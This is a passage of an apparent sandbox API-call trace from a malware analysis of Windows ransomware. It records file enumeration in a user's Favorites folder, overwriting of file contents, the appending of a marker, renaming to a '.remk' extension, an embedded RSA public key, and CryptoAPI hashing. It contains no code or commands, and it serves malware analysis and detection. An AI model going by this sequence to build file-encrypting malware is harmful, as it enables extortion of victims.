Size=0xc) returned 0x31ee508 [0233.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee520 [0233.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee4f0 [0233.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee580 [0233.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0233.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee550 [0233.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee538 [0233.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee598 [0233.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee538 | out: hHeap=0x630000) returned 1 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee538 [0233.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee550 | out: hHeap=0x630000) returned 1 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0233.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee508 | out: hHeap=0x630000) returned 1 [0233.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee508 [0233.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0233.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee568 | out: hHeap=0x630000) returned 1 [0233.840] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.840] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.841] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.841] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.841] CloseHandle (hObject=0x640) returned 1 [0233.842] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.remk")) returned 1 [0233.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0233.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.843] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0233.844] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0233.844] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned=".url" [0233.844] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.844] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0233.844] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.847] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.847] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.848] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0233.848] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.848] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.848] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.848] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0233.849] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.849] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.849] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.849] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.849] GetLastError () returned 0x0 [0233.849] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.849] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0233.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.849] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.849] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.850] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.850] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee520 | out: hHeap=0x630000) returned 1 [0233.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee538 | out: hHeap=0x630000) returned 1 [0233.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee580 | out: hHeap=0x630000) returned 1 [0233.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee580 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee538 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee520 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee538 | out: hHeap=0x630000) returned 1 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee520 | out: hHeap=0x630000) returned 1 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee580 | out: hHeap=0x630000) returned 1 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.851] GetCurrentThreadId () returned 0x314 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c2320 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.851] GetCurrentThreadId () returned 0x314 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee580 [0233.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee520 [0233.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0233.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee538 [0233.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee508 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee598 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee568 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee550 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee5b0 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee550 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee550 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee568 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee520 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee520 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee580 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee5b0 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0233.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee520 | out: hHeap=0x630000) returned 1 [0233.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0233.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee550 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee598 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee538 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee508 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0233.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee4f0 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bbb70 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0233.855] 